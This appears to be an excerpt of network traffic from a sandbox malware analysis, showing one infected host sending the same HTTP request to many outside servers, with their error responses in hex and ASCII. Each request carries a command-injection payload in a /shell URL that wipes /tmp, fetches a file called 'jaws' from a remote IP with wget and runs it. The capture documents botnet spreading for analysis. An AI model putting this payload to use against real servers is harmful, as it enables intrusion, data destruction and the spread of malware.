                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          305192.168.2.234106691.185.13.23680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.775188923 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:42.378799915 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:44.266542912 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:48.009989977 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:55.688904047 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.790776014 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:42.018394947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          306192.168.2.2344196204.152.46.6780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.815829039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:40.980956078 CET121INHTTP/1.1 302 Found
                                                          Location: https:///shell?cd+/tmp;rm+-rf+*;wget+
                                                          Connection: close
                                                          Content-Length: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          307192.168.2.233952434.233.79.10180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:40.913374901 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.071512938 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          308192.168.2.2350912104.92.147.4680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:41.035412073 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.315715075 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 32 32 61 64 35 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 31 26 23 34 36 3b 38 38 35 62 37 63 39 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;222ad517&#46;1704173081&#46;885b7c99</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          309192.168.2.235923258.152.149.580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:41.116384983 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.418021917 CET322INHTTP/1.1 404 Not Found
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:24:40 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          310192.168.2.235733031.41.88.1280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:41.167213917 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.440023899 CET1286INHTTP/1.1 400 Bad Request
                                                          Date: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Server: gvs 1.0
                                                          Connection: Close
                                                          Content-Length: 1555
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31
                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_1
                                                          Jan 2, 2024 06:24:41.440037012 CET506INData Raw: 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61
                                                          Data Ascii: 50x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-bloc


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          311192.168.2.234760623.194.49.1680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:41.187072039 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.541212082 CET430INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 208
                                                          Expires: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 63 37 30 65 37 33 31 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 31 26 23 34 36 3b 61 36 32 61 64 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;5c70e731&#46;1704173081&#46;a62ad65</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          312192.168.2.234288613.127.14.18580
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:41.189471960 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.546849012 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          313192.168.2.235584049.44.196.20880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:41.307799101 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:41.721411943 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Date: Tue, 02 Jan 2024 05:24:41 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 63 63 63 34 32 63 33 31 26 23 34 36 3b 31 37 30 34 31 37 33 30 38 31 26 23 34 36 3b 35 64 37 38 36 39 30 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;ccc42c31&#46;1704173081&#46;5d786900</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          314192.168.2.233303618.67.255.7180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:42.963613987 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.206321001 CET316INHTTP/1.1 403 Forbidden
                                                          Server: CloudFront
                                                          Date: Tue, 02 Jan 2024 05:24:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 151
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>CloudFront</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          315192.168.2.234282889.212.109.24080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:42.987046003 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          316192.168.2.2357888202.43.100.11380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.056570053 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.402298927 CET502INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:42 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          317192.168.2.236096613.250.225.1680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:24:43.065655947 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:24:43.411479950 CET401INHTTP/1.1 301 Moved Permanently
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:24:43 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 134
                                                          Connection: keep-alive
                                                          Location: https://127.0.0.1:443/shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
